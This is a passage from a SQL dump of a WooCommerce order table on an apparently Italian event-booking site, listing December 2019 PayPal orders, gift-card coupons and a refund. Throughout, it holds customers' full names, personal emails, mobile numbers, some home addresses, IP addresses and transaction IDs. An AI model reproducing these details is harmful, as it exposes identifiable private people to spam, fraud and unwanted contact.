Safari/537.36'),(19440,914,'_created_via','checkout'),(19441,914,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(19442,914,'_billing_first_name','Alessandro'),(19443,914,'_billing_last_name','Melotti'),(19444,914,'_billing_email','ale.melotti@gmail.com'),(19445,914,'_billing_phone','3355289898'),(19446,914,'_order_currency','EUR'),(19447,914,'_cart_discount','0'),(19448,914,'_cart_discount_tax','0'),(19449,914,'_order_shipping','0.00'),(19450,914,'_order_shipping_tax','0'),(19451,914,'_order_tax','0'),(19452,914,'_order_total','120.00'),(19453,914,'_order_version','3.8.1'),(19454,914,'_prices_include_tax','no'),(19455,914,'_billing_address_index','Alessandro Melotti        ale.melotti@gmail.com 3355289898'),(19456,914,'_shipping_address_index','        '),(19457,914,'is_vat_exempt','no'),(19458,914,'Quanti adulti?','4'),(19459,914,'Numero bambini fino a 6 anni','0'),(19460,914,'Numero ragazzi fino a 14 anni','0'),(19461,914,'Numero ragazzi dai 15 anni in su','0'),(19462,914,'Files attached','[]'),(19463,914,'Payment type','instant'),(19464,914,'_transaction_id','0R356936G0086054V'),(19465,914,'_paypal_status','completed'),(19466,914,'PayPal Transaction Fee','4.43'),(19467,914,'_date_paid','1576673668'),(19468,914,'_paid_date','2019-12-18 13:54:28'),(19469,914,'_download_permissions_granted','yes'),(19470,914,'_recorded_sales','yes'),(19471,914,'_recorded_coupon_usage_counts','yes'),(19472,914,'_order_stock_reduced','yes'),(19473,915,'_order_key','wc_order_M8zCetfRFzaif'),(19474,915,'_customer_user','0'),(19475,915,'_payment_method','paypal'),(19476,915,'_payment_method_title','PayPal'),(19477,915,'_customer_ip_address','82.188.237.250'),(19478,915,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36'),(19479,915,'_created_via','checkout'),(19480,915,'_cart_hash','83f2ac32e5e1cc9c112bdbcaca46f659'),(19481,915,'_billing_first_name','David'),(19482,915,'_billing_last_name','Lazzari'),(19483,915,'_billing_address_1','Strada San Martino, 90/E'),(19484,915,'_billing_city','Terni'),(19485,915,'_billing_email','lazzarid@aospterni.it'),(19486,915,'_billing_phone','3491512611'),(19487,915,'_order_currency','EUR'),(19488,915,'_cart_discount','0'),(19489,915,'_cart_discount_tax','0'),(19490,915,'_order_shipping','0.00'),(19491,915,'_order_shipping_tax','0'),(19492,915,'_order_tax','0'),(19493,915,'_order_total','60.00'),(19494,915,'_order_version','3.8.1'),(19495,915,'_prices_include_tax','no'),(19496,915,'_billing_address_index','David Lazzari  Strada San Martino, 90/E  Terni    lazzarid@aospterni.it 3491512611'),(19497,915,'_shipping_address_index','        '),(19498,915,'is_vat_exempt','no'),(19499,915,'Quanti adulti?','2'),(19500,915,'Numero bambini fino a 6 anni','0'),(19501,915,'Numero ragazzi fino a 14 anni','0'),(19502,915,'Numero ragazzi dai 15 anni in su','0'),(19503,915,'Files attached','[]'),(19504,915,'Payment type','instant'),(19505,915,'_transaction_id','4FM05100E6906824F'),(19506,915,'_paypal_status','completed'),(19507,915,'PayPal Transaction Fee','2.39'),(19508,915,'_date_paid','1576676297'),(19509,915,'_paid_date','2019-12-18 14:38:17'),(19510,915,'_download_permissions_granted','yes'),(19511,915,'_recorded_sales','yes'),(19512,915,'_recorded_coupon_usage_counts','yes'),(19513,915,'_order_stock_reduced','yes'),(19514,916,'_order_key','wc_order_Hzp9ffJkgdKvU'),(19515,916,'_customer_user','0'),(19516,916,'_payment_method','paypal'),(19517,916,'_payment_method_title','PayPal'),(19518,916,'_customer_ip_address','62.97.2.33'),(19519,916,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),(19520,916,'_created_via','checkout'),(19521,916,'_cart_hash','1ed222f7950d59e46f6abae88a342d0b'),(19522,916,'_billing_first_name','paola'),(19523,916,'_billing_last_name','signoretti'),(19524,916,'_billing_city','verona'),(19525,916,'_billing_email','paola.albastella@gmail.com'),(19526,916,'_billing_phone','3458430205'),(19527,916,'_order_currency','EUR'),(19528,916,'_cart_discount','0'),(19529,916,'_cart_discount_tax','0'),(19530,916,'_order_shipping','0.00'),(19531,916,'_order_shipping_tax','0'),(19532,916,'_order_tax','0'),(19533,916,'_order_total','45.00'),(19534,916,'_order_version','3.8.1'),(19535,916,'_prices_include_tax','no'),(19536,916,'_billing_address_index','paola signoretti    verona    paola.albastella@gmail.com 3458430205'),(19537,916,'_shipping_address_index','        '),(19538,916,'is_vat_exempt','no'),(19539,916,'Quanti adulti?','3'),(19540,916,'Numero bambini fino a 6 anni','0'),(19541,916,'Numero ragazzi fino a 14 anni','0'),(19542,916,'Numero ragazzi dai 15 anni in su','0'),(19543,916,'Files attached','[]'),(19544,916,'Payment type','instant'),(19545,916,'_transaction_id','9TS39970NR795615G'),(19546,916,'_paypal_status','completed'),(19547,916,'PayPal Transaction Fee','1.88'),(19548,916,'_date_paid','1576678158'),(19549,916,'_paid_date','2019-12-18 15:09:18'),(19550,916,'_download_permissions_granted','yes'),(19551,916,'_recorded_sales','yes'),(19552,916,'_recorded_coupon_usage_counts','yes'),(19553,916,'_order_stock_reduced','yes'),(19554,917,'_order_key','wc_order_pZXcACEltbOcP'),(19555,917,'_customer_user','58'),(19556,917,'_payment_method','paypal'),(19557,917,'_payment_method_title','PayPal'),(19558,917,'_customer_ip_address','5.170.83.10'),(19559,917,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36'),(19560,917,'_created_via','checkout'),(19561,917,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(19562,917,'_billing_first_name','Roberto'),(19563,917,'_billing_last_name','Zanasi'),(19564,917,'_billing_email','zanasi76@gmail.com'),(19565,917,'_billing_phone','335-5303146'),(19566,917,'_order_currency','EUR'),(19567,917,'_cart_discount','0'),(19568,917,'_cart_discount_tax','0'),(19569,917,'_order_shipping','0.00'),(19570,917,'_order_shipping_tax','0'),(19571,917,'_order_tax','0'),(19572,917,'_order_total','30.00'),(19573,917,'_order_version','3.8.1'),(19574,917,'_prices_include_tax','no'),(19575,917,'_billing_address_index','Roberto Zanasi        zanasi76@gmail.com 335-5303146'),(19576,917,'_shipping_address_index','        '),(19577,917,'is_vat_exempt','no'),(19578,917,'Quanti adulti?','1'),(19579,917,'Numero bambini fino a 6 anni','0'),(19580,917,'Numero ragazzi fino a 14 anni','0'),(19581,917,'Numero ragazzi dai 15 anni in su','0'),(19582,917,'Files attached','[]'),(19583,917,'Payment type','instant'),(19584,917,'_transaction_id','6CW90573C7316714G'),(19585,917,'_paypal_status','completed'),(19586,917,'PayPal Transaction Fee','1.37'),(19587,917,'_date_paid','1576689079'),(19588,917,'_paid_date','2019-12-18 18:11:19'),(19589,917,'_download_permissions_granted','yes'),(19590,917,'_recorded_sales','yes'),(19591,917,'_recorded_coupon_usage_counts','yes'),(19592,917,'_order_stock_reduced','yes'),(19593,918,'_order_key','wc_order_xyGrBMH4yHmnC'),(19594,918,'_customer_user','0'),(19595,918,'_payment_method','paypal'),(19596,918,'_payment_method_title','PayPal'),(19597,918,'_customer_ip_address','2.41.238.110'),(19598,918,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36'),(19599,918,'_created_via','checkout'),(19600,918,'_cart_hash','f296d822d4cff39f8109b2d4293cd699'),(19601,918,'_billing_first_name','marco'),(19602,918,'_billing_last_name','lambertini'),(19603,918,'_billing_email','marco.lambertini64@gmail.com'),(19604,918,'_billing_phone','3355855708'),(19605,918,'_order_currency','EUR'),(19606,918,'_cart_discount','0'),(19607,918,'_cart_discount_tax','0'),(19608,918,'_order_shipping','0.00'),(19609,918,'_order_shipping_tax','0'),(19610,918,'_order_tax','0'),(19611,918,'_order_total','120.00'),(19612,918,'_order_version','3.8.1'),(19613,918,'_prices_include_tax','no'),(19614,918,'_billing_address_index','marco lambertini        marco.lambertini64@gmail.com 3355855708'),(19615,918,'_shipping_address_index','        '),(19616,918,'is_vat_exempt','no'),(19617,918,'Quanti adulti?','4'),(19618,918,'Numero bambini fino a 6 anni','0'),(19619,918,'Numero ragazzi fino a 14 anni','0'),(19620,918,'Numero ragazzi dai 15 anni in su','0'),(19621,918,'Files attached','[]'),(19622,918,'Payment type','instant'),(19623,918,'_transaction_id','5JN51651GP098245V'),(19624,918,'_paypal_status','completed'),(19625,918,'PayPal Transaction Fee','4.43'),(19626,918,'_date_paid','1576691419'),(19627,918,'_paid_date','2019-12-18 18:50:19'),(19628,918,'_download_permissions_granted','yes'),(19629,918,'_recorded_sales','yes'),(19630,918,'_recorded_coupon_usage_counts','yes'),(19631,918,'_order_stock_reduced','yes'),(19632,919,'_order_key','wc_order_CdlXjhgHz82cd'),(19633,919,'_customer_user','0'),(19634,919,'_payment_method','paypal'),(19635,919,'_payment_method_title','PayPal'),(19636,919,'_customer_ip_address','95.235.240.197'),(19637,919,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(19638,919,'_created_via','checkout'),(19639,919,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(19640,919,'_billing_first_name','Mirca'),(19641,919,'_billing_last_name','Moretti'),(19642,919,'_billing_city','Santarcangelo ci romagna'),(19643,919,'_billing_email','Santimoretti@hotmail.it'),(19644,919,'_billing_phone','3803921358'),(19645,919,'_order_currency','EUR'),(19646,919,'_cart_discount','0'),(19647,919,'_cart_discount_tax','0'),(19648,919,'_order_shipping','0.00'),(19649,919,'_order_shipping_tax','0'),(19650,919,'_order_tax','0'),(19651,919,'_order_total','30.00'),(19652,919,'_order_version','3.8.1'),(19653,919,'_prices_include_tax','no'),(19654,919,'_billing_address_index','Mirca Moretti    Santarcangelo ci romagna    Santimoretti@hotmail.it 3803921358'),(19655,919,'_shipping_address_index','        '),(19656,919,'is_vat_exempt','no'),(19657,919,'Quanti adulti?','1'),(19658,919,'Numero bambini fino a 6 anni','0'),(19659,919,'Numero ragazzi fino a 14 anni','0'),(19660,919,'Numero ragazzi dai 15 anni in su','0'),(19661,919,'Files attached','[]'),(19662,919,'Payment type','instant'),(19663,919,'_transaction_id','6GS80257DM691500G'),(19664,919,'_paypal_status','completed'),(19665,919,'PayPal Transaction Fee','1.37'),(19666,919,'_date_paid','1576694049'),(19667,919,'_paid_date','2019-12-18 19:34:09'),(19668,919,'_download_permissions_granted','yes'),(19669,919,'_recorded_sales','yes'),(19670,919,'_recorded_coupon_usage_counts','yes'),(19671,919,'_order_stock_reduced','yes'),(19672,920,'_order_key','wc_order_911oAnsRCLha7'),(19673,920,'_customer_user','0'),(19674,920,'_payment_method','paypal'),(19675,920,'_payment_method_title','PayPal'),(19676,920,'_customer_ip_address','5.102.19.121'),(19677,920,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15'),(19678,920,'_created_via','checkout'),(19679,920,'_cart_hash','83f2ac32e5e1cc9c112bdbcaca46f659'),(19680,920,'_billing_first_name','michelangelo'),(19681,920,'_billing_last_name','galliani'),(19682,920,'_billing_address_1','via ezio comparoni 3/b'),(19683,920,'_billing_city','montecchio emilia RE'),(19684,920,'_billing_email','michelangelogalliani@gmail.com'),(19685,920,'_billing_phone','3923050911'),(19686,920,'_order_currency','EUR'),(19687,920,'_cart_discount','0'),(19688,920,'_cart_discount_tax','0'),(19689,920,'_order_shipping','0.00'),(19690,920,'_order_shipping_tax','0'),(19691,920,'_order_tax','0'),(19692,920,'_order_total','60.00'),(19693,920,'_order_version','3.8.1'),(19694,920,'_prices_include_tax','no'),(19695,920,'_billing_address_index','michelangelo galliani  via ezio comparoni 3/b  montecchio emilia RE    michelangelogalliani@gmail.com 3923050911'),(19696,920,'_shipping_address_index','        '),(19697,920,'is_vat_exempt','no'),(19698,920,'Quanti adulti?','1'),(19699,920,'Numero bambini fino a 6 anni','0'),(19700,920,'Numero ragazzi fino a 14 anni','0'),(19701,920,'Numero ragazzi dai 15 anni in su','0'),(19702,920,'Files attached','[]'),(19703,920,'Payment type','instant'),(19704,920,'_transaction_id','3UY47081TJ2977503'),(19705,920,'_paypal_status','completed'),(19706,920,'PayPal Transaction Fee','2.39'),(19707,920,'_date_paid','1576709750'),(19708,920,'_paid_date','2019-12-18 23:55:50'),(19709,920,'_download_permissions_granted','yes'),(19710,920,'_recorded_sales','yes'),(19711,920,'_recorded_coupon_usage_counts','yes'),(19712,920,'_order_stock_reduced','yes'),(19713,921,'_order_key','wc_order_NLKLopG5fA6Kh'),(19714,921,'_customer_user','0'),(19715,921,'_payment_method','paypal'),(19716,921,'_payment_method_title','PayPal'),(19717,921,'_customer_ip_address','79.37.150.123'),(19718,921,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1'),(19719,921,'_created_via','checkout'),(19720,921,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(19721,921,'_billing_first_name','Daniela'),(19722,921,'_billing_last_name','Bolognesi'),(19723,921,'_billing_address_1','Campegine'),(19724,921,'_billing_city','Reggio Emilia'),(19725,921,'_billing_email','Pietro.code@gmail.com'),(19726,921,'_billing_phone','3467209275'),(19727,921,'_order_currency','EUR'),(19728,921,'_cart_discount','0'),(19729,921,'_cart_discount_tax','0'),(19730,921,'_order_shipping','0.00'),(19731,921,'_order_shipping_tax','0'),(19732,921,'_order_tax','0'),(19733,921,'_order_total','120.00'),(19734,921,'_order_version','3.8.1'),(19735,921,'_prices_include_tax','no'),(19736,921,'_billing_address_index','Daniela Bolognesi  Campegine  Reggio Emilia    Pietro.code@gmail.com 3467209275'),(19737,921,'_shipping_address_index','        '),(19738,921,'is_vat_exempt','no'),(19739,921,'Quanti adulti?','4'),(19740,921,'Numero bambini fino a 6 anni','0'),(19741,921,'Numero ragazzi fino a 14 anni','0'),(19742,921,'Numero ragazzi dai 15 anni in su','0'),(19743,921,'Files attached','[]'),(19744,921,'Payment type','instant'),(19745,921,'_transaction_id','00E29739XL4417804'),(19746,921,'_paypal_status','completed'),(19747,921,'PayPal Transaction Fee','4.43'),(19748,921,'_date_paid','1576951315'),(19749,921,'_paid_date','2019-12-21 19:01:55'),(19750,921,'_download_permissions_granted','yes'),(19751,921,'_recorded_sales','yes'),(19752,921,'_recorded_coupon_usage_counts','yes'),(19753,921,'_order_stock_reduced','yes'),(19754,922,'_order_key','wc_order_UPAn7B0hTC837'),(19755,922,'_customer_user','0'),(19756,922,'_payment_method','paypal'),(19757,922,'_payment_method_title','PayPal'),(19758,922,'_customer_ip_address','93.39.149.183'),(19759,922,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(19760,922,'_created_via','checkout'),(19761,922,'_cart_hash','85089f4ec22849a5044d032c384226b5'),(19762,922,'_billing_first_name','Marco'),(19763,922,'_billing_last_name','Girardi'),(19764,922,'_billing_address_1','Via Primo Maggio 60'),(19765,922,'_billing_city','Terni'),(19766,922,'_billing_email','girardimarco61@gmail.com'),(19767,922,'_billing_phone','3343967501'),(19768,922,'_order_currency','EUR'),(19769,922,'_cart_discount','0'),(19770,922,'_cart_discount_tax','0'),(19771,922,'_order_shipping','0.00'),(19772,922,'_order_shipping_tax','0'),(19773,922,'_order_tax','0'),(19774,922,'_order_total','60.00'),(19775,922,'_order_version','3.8.1'),(19776,922,'_prices_include_tax','no'),(19777,922,'_billing_address_index','Marco Girardi  Via Primo Maggio 60  Terni    girardimarco61@gmail.com 3343967501'),(19778,922,'_shipping_address_index','        '),(19779,922,'is_vat_exempt','no'),(19780,922,'Quanti adulti?','2'),(19781,922,'Numero bambini fino a 6 anni','0'),(19782,922,'Numero ragazzi fino a 14 anni','0'),(19783,922,'Numero ragazzi dai 15 anni in su','0'),(19784,922,'Files attached','[]'),(19785,922,'Payment type','instant'),(19786,922,'_transaction_id','0WS42006E7505615C'),(19787,922,'_paypal_status','completed'),(19788,922,'PayPal Transaction Fee','2.39'),(19789,922,'_date_paid','1577013143'),(19790,922,'_paid_date','2019-12-22 12:12:23'),(19791,922,'_download_permissions_granted','yes'),(19792,922,'_recorded_sales','yes'),(19793,922,'_recorded_coupon_usage_counts','yes'),(19794,922,'_order_stock_reduced','yes'),(19795,923,'discount_type','fixed_cart'),(19796,923,'coupon_amount','60'),(19797,923,'individual_use','no'),(19798,923,'usage_limit','1'),(19799,923,'date_expires','1592524800'),(19800,923,'apply_before_tax','no'),(19801,923,'free_shipping','yes'),(19802,923,'minimum_amount',''),(19803,923,'maximum_amount',''),(19804,923,'exclude_sale_items','no'),(19805,923,'exclude_product_ids',''),(19806,923,'exclude_product_categories',''),(19807,923,'product_ids',''),(19808,923,'product_categories','a:0:{}'),(19809,923,'mwb_wgm_giftcard_coupon','922'),(19810,923,'mwb_wgm_giftcard_coupon_unique','online'),(19811,923,'mwb_wgm_giftcard_coupon_product_id','548'),(19812,923,'mwb_wgm_giftcard_coupon_mail_to','girardimarco61@gmail.com'),(19813,922,'922#349','a:1:{i:0;s:18:\"solymarcouponEX5WE\";}'),(19814,922,'mwb_wgm_order_giftcard','send'),(19815,924,'_order_key','wc_order_lfLVgxECmN22h'),(19816,924,'_customer_user','58'),(19817,924,'_payment_method','paypal'),(19818,924,'_payment_method_title','PayPal'),(19819,924,'_customer_ip_address','82.55.57.151'),(19820,924,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(19821,924,'_created_via','checkout'),(19822,924,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(19823,924,'_billing_first_name','Roberto'),(19824,924,'_billing_last_name','Zanasi'),(19825,924,'_billing_email','zanasi76@gmail.com'),(19826,924,'_billing_phone','335-5303146'),(19827,924,'_order_currency','EUR'),(19828,924,'_cart_discount','0'),(19829,924,'_cart_discount_tax','0'),(19830,924,'_order_shipping','0.00'),(19831,924,'_order_shipping_tax','0'),(19832,924,'_order_tax','0'),(19833,924,'_order_total','30.00'),(19834,924,'_order_version','3.8.1'),(19835,924,'_prices_include_tax','no'),(19836,924,'_billing_address_index','Roberto Zanasi        zanasi76@gmail.com 335-5303146'),(19837,924,'_shipping_address_index','        '),(19838,924,'is_vat_exempt','no'),(19839,924,'Quanti adulti?','2'),(19840,924,'Numero bambini fino a 6 anni','0'),(19841,924,'Numero ragazzi fino a 14 anni','0'),(19842,924,'Numero ragazzi dai 15 anni in su','0'),(19843,924,'Files attached','[]'),(19844,924,'Payment type','instant'),(19845,924,'_transaction_id','95A31925X5162725R'),(19846,924,'_paypal_status','completed'),(19847,924,'PayPal Transaction Fee','1.37'),(19848,924,'_date_paid','1577027032'),(19849,924,'_paid_date','2019-12-22 16:03:52'),(19850,924,'_download_permissions_granted','yes'),(19851,924,'_recorded_sales','yes'),(19852,924,'_recorded_coupon_usage_counts','yes'),(19853,924,'_order_stock_reduced','yes'),(19854,925,'_order_currency','EUR'),(19855,925,'_cart_discount','0'),(19856,925,'_cart_discount_tax','0'),(19857,925,'_order_shipping','0'),(19858,925,'_order_shipping_tax','0'),(19859,925,'_order_tax','0'),(19860,925,'_order_total','-60.00'),(19861,925,'_order_version','3.8.1'),(19862,925,'_prices_include_tax','no'),(19863,925,'_refund_amount','60'),(19864,925,'_refunded_by','1'),(19865,925,'_refunded_payment',''),(19866,925,'_refund_reason','Ordine completamente rimborsato.'),(19867,926,'_order_key','wc_order_b7Q7SJyPrbL2u'),(19868,926,'_customer_user','0'),(19869,926,'_payment_method','paypal'),(19870,926,'_payment_method_title','PayPal'),(19871,926,'_customer_ip_address','5.170.80.81'),(19872,926,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(19873,926,'_created_via','checkout'),(19874,926,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(19875,926,'_billing_first_name','Mirca'),(19876,926,'_billing_last_name','Moretti'),(19877,926,'_billing_address_1','Via Berlino 66'),(19878,926,'_billing_city','Santarcangelo di romagna'),(19879,926,'_billing_email','Santimoretti@hotmail.it'),(19880,926,'_billing_phone','3803921358'),(19881,926,'_order_currency','EUR'),(19882,926,'_cart_discount','0'),(19883,926,'_cart_discount_tax','0'),(19884,926,'_order_shipping','0.00'),(19885,926,'_order_shipping_tax','0'),(19886,926,'_order_tax','0'),(19887,926,'_order_total','30.00'),(19888,926,'_order_version','3.8.1'),(19889,926,'_prices_include_tax','no'),(19890,926,'_billing_address_index','Mirca Moretti  Via Berlino 66  Santarcangelo di romagna    Santimoretti@hotmail.it 3803921358'),(19891,926,'_shipping_address_index','        '),(19892,926,'is_vat_exempt','no'),(19893,926,'Quanti adulti?','1'),(19894,926,'Numero bambini fino a 6 anni','0'),(19895,926,'Numero ragazzi fino a 14 anni','0'),(19896,926,'Numero ragazzi dai 15 anni in su','0'),(19897,926,'Files attached','[]'),(19898,926,'is_vat_exempt','no'),(19899,926,'is_vat_exempt','no'),(19900,926,'Payment type','instant'),(19901,926,'_transaction_id','06D95073T3060954R'),(19902,926,'_paypal_status','completed'),(19903,926,'PayPal Transaction Fee','1.37'),(19904,926,'_date_paid','1577093446'),(19905,926,'_paid_date','2019-12-23 10:30:46'),(19906,926,'_download_permissions_granted','yes'),(19907,926,'_recorded_sales','yes'),(19908,926,'_recorded_coupon_usage_counts','yes'),(19909,926,'_order_stock_reduced','yes'),(19910,927,'_order_key','wc_order_hshZShRwCgLeA'),(19911,927,'_customer_user','0'),(19912,927,'_payment_method','paypal'),(19913,927,'_payment_method_title','PayPal'),(19914,927,'_customer_ip_address','87.8.197.129'),(19915,927,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15'),(19916,927,'_created_via','checkout'),(19917,927,'_cart_hash','e9b6ea97b654363be2e7c56c0244ed67'),(19918,927,'_billing_first_name','Valentina'),(19919,927,'_billing_last_name','Maletti'),(19920,927,'_billing_email','valentina.maletti@gmail.com'),(19921,927,'_billing_phone','3406058837'),(19922,927,'_order_currency','EUR'),(19923,927,'_cart_discount','0'),(19924,927,'_cart_discount_tax','0'),(19925,927,'_order_shipping','0.00'),(19926,927,'_order_shipping_tax','0'),(19927,927,'_order_tax','0'),(19928,927,'_order_total','90.00'),(19929,927,'_order_version','3.8.1'),(19930,927,'_prices_include_tax','no'),(19931,927,'_billing_address_index','Valentina Maletti        valentina.maletti@gmail.com 3406058837'),(19932,927,'_shipping_address_index','        '),(19933,927,'is_vat_exempt','no'),(19934,927,'Quanti adulti?','2'),(19935,927,'Numero bambini fino a 6 anni','0'),(19936,927,'Numero ragazzi fino a 14 anni','0'),(19937,927,'Numero ragazzi dai 15 anni in su','0'),(19938,927,'Files attached','[]'),(19939,927,'Payment type','instant'),(19940,927,'_transaction_id','6RG59415Y3667853E'),(19941,927,'_paypal_status','completed'),(19942,927,'PayPal Transaction Fee','3.41'),(19943,927,'_date_paid','1577094405'),(19944,927,'_paid_date','2019-12-23 10:46:45'),(19945,927,'_download_permissions_granted','yes'),(19946,927,'_recorded_sales','yes'),(19947,927,'_recorded_coupon_usage_counts','yes'),(19948,927,'_order_stock_reduced','yes'),(19949,928,'discount_type','fixed_cart'),(19950,928,'coupon_amount','90'),(19951,928,'individual_use','no'),(19952,928,'usage_limit','1'),(19953,928,'date_expires','1592611200'),(19954,928,'apply_before_tax','no'),(19955,928,'free_shipping','yes'),(19956,928,'minimum_amount',''),(19957,928,'maximum_amount',''),(19958,928,'exclude_sale_items','no'),(19959,928,'exclude_product_ids',''),(19960,928,'exclude_product_categories',''),(19961,928,'product_ids',''),(19962,928,'product_categories','a:0:{}'),(19963,928,'mwb_wgm_giftcard_coupon','927'),(19964,928,'mwb_wgm_giftcard_coupon_unique','online'),(19965,928,'mwb_wgm_giftcard_coupon_product_id','548'),(19966,928,'mwb_wgm_giftcard_coupon_mail_to','mamma e papà'),(19967,927,'927#354','a:1:{i:0;s:18:\"solymarcouponZTFTP\";}'),(19968,927,'mwb_wgm_order_giftcard','send'),(19969,929,'_order_key','wc_order_prjsu09YJZTJw'),(19970,929,'_customer_user','0'),(19971,929,'_payment_method','paypal'),(19972,929,'_payment_method_title','PayPal'),(19973,929,'_customer_ip_address','79.26.138.21'),(19974,929,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15'),(19975,929,'_created_via','checkout'),(19976,929,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(19977,929,'_billing_first_name','Mattia'),(19978,929,'_billing_last_name','Bacchiani'),(19979,929,'_billing_email','mattiabacchiani@gmail.com'),(19980,929,'_billing_phone','3318683485'),(19981,929,'_order_currency','EUR'),(19982,929,'_cart_discount','0'),(19983,929,'_cart_discount_tax','0'),(19984,929,'_order_shipping','0.00'),(19985,929,'_order_shipping_tax','0'),(19986,929,'_order_tax','0'),(19987,929,'_order_total','30.00'),(19988,929,'_order_version','4.2.0'),(19989,929,'_prices_include_tax','no'),(19990,929,'_billing_address_index','Mattia Bacchiani        mattiabacchiani@gmail.com 3318683485'),(19991,929,'_shipping_address_index','        '),(19992,929,'is_vat_exempt','no'),(19993,929,'Quanti adulti?','2'),(19994,929,'Numero bambini fino a 6 anni','0'),(19995,929,'Numero ragazzi fino a 14 anni','0'),(19996,929,'Numero ragazzi dai 15 anni in su','0'),(19997,929,'Files attached','[]'),(19998,930,'_order_key','wc_order_RpRw7erS6lV2x'),(19999,930,'_customer_user','0'),(20000,930,'_payment_method','paypal'),(20001,930,'_payment_method_title','PayPal'),(20002,930,'_customer_ip_address','2.42.152.215'),(20003,930,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1'),(20004,930,'_created_via','checkout'),(20005,930,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20006,930,'_billing_first_name','Mattia'),(20007,930,'_billing_last_name','Bacchiani'),(20008,930,'_billing_email','mattiabacchiani@gmail.com'),(20009,930,'_billing_phone','3318683485'),(20010,930,'_order_currency','EUR'),(20011,930,'_cart_discount','0'),(20012,930,'_cart_discount_tax','0'),(20013,930,'_order_shipping','0.00'),(20014,930,'_order_shipping_tax','0'),(20015,930,'_order_tax','0'),(20016,930,'_order_total','30.00'),(20017,930,'_order_version','3.8.1'),(20018,930,'_prices_include_tax','no'),(20019,930,'_billing_address_index','Mattia Bacchiani        mattiabacchiani@gmail.com 3318683485'),(20020,930,'_shipping_address_index','        '),(20021,930,'is_vat_exempt','no'),(20022,930,'Quanti adulti?','2'),(20023,930,'Numero bambini fino a 6 anni','0'),(20024,930,'Numero ragazzi fino a 14 anni','0'),(20025,930,'Numero ragazzi dai 15 anni in su','0'),(20026,930,'Files attached','[]'),(20027,930,'Payment type','instant'),(20028,930,'_transaction_id','8KE65707PF236012W'),(20029,930,'_paypal_status','completed'),(20030,930,'PayPal Transaction Fee','1.37'),(20031,930,'_date_paid','1577116891'),(20032,930,'_paid_date','2019-12-23 17:01:31'),(20033,930,'_download_permissions_granted','yes'),(20034,930,'_recorded_sales','yes'),(20035,930,'_recorded_coupon_usage_counts','yes'),(20036,930,'_order_stock_reduced','yes'),(20037,931,'_order_key','wc_order_exaZxWPZNXidm'),(20038,931,'_customer_user','0'),(20039,931,'_payment_method','paypal'),(20040,931,'_payment_method_title','PayPal'),(20041,931,'_customer_ip_address','2.42.152.215'),(20042,931,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1'),(20043,931,'_created_via','checkout'),(20044,931,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20045,931,'_billing_first_name','Mattia'),(20046,931,'_billing_last_name','Bacchiani'),(20047,931,'_billing_email','mattiabacchiani@gmail.com'),(20048,931,'_billing_phone','3318683485'),(20049,931,'_order_currency','EUR'),(20050,931,'_cart_discount','0'),(20051,931,'_cart_discount_tax','0'),(20052,931,'_order_shipping','0.00'),(20053,931,'_order_shipping_tax','0'),(20054,931,'_order_tax','0'),(20055,931,'_order_total','30.00'),(20056,931,'_order_version','4.2.0'),(20057,931,'_prices_include_tax','no'),(20058,931,'_billing_address_index','Mattia Bacchiani        mattiabacchiani@gmail.com 3318683485'),(20059,931,'_shipping_address_index','        '),(20060,931,'is_vat_exempt','no'),(20061,931,'Quanti adulti?','2'),(20062,931,'Numero bambini fino a 6 anni','0'),(20063,931,'Numero ragazzi fino a 14 anni','0'),(20064,931,'Numero ragazzi dai 15 anni in su','0'),(20065,931,'Files attached','[]'),(20066,932,'_order_key','wc_order_y6PlIGBzqhFuG'),(20067,932,'_customer_user','0'),(20068,932,'_payment_method','paypal'),(20069,932,'_payment_method_title','PayPal'),(20070,932,'_customer_ip_address','2.42.152.215'),(20071,932,'_customer_user_agent','Mozilla/5.0 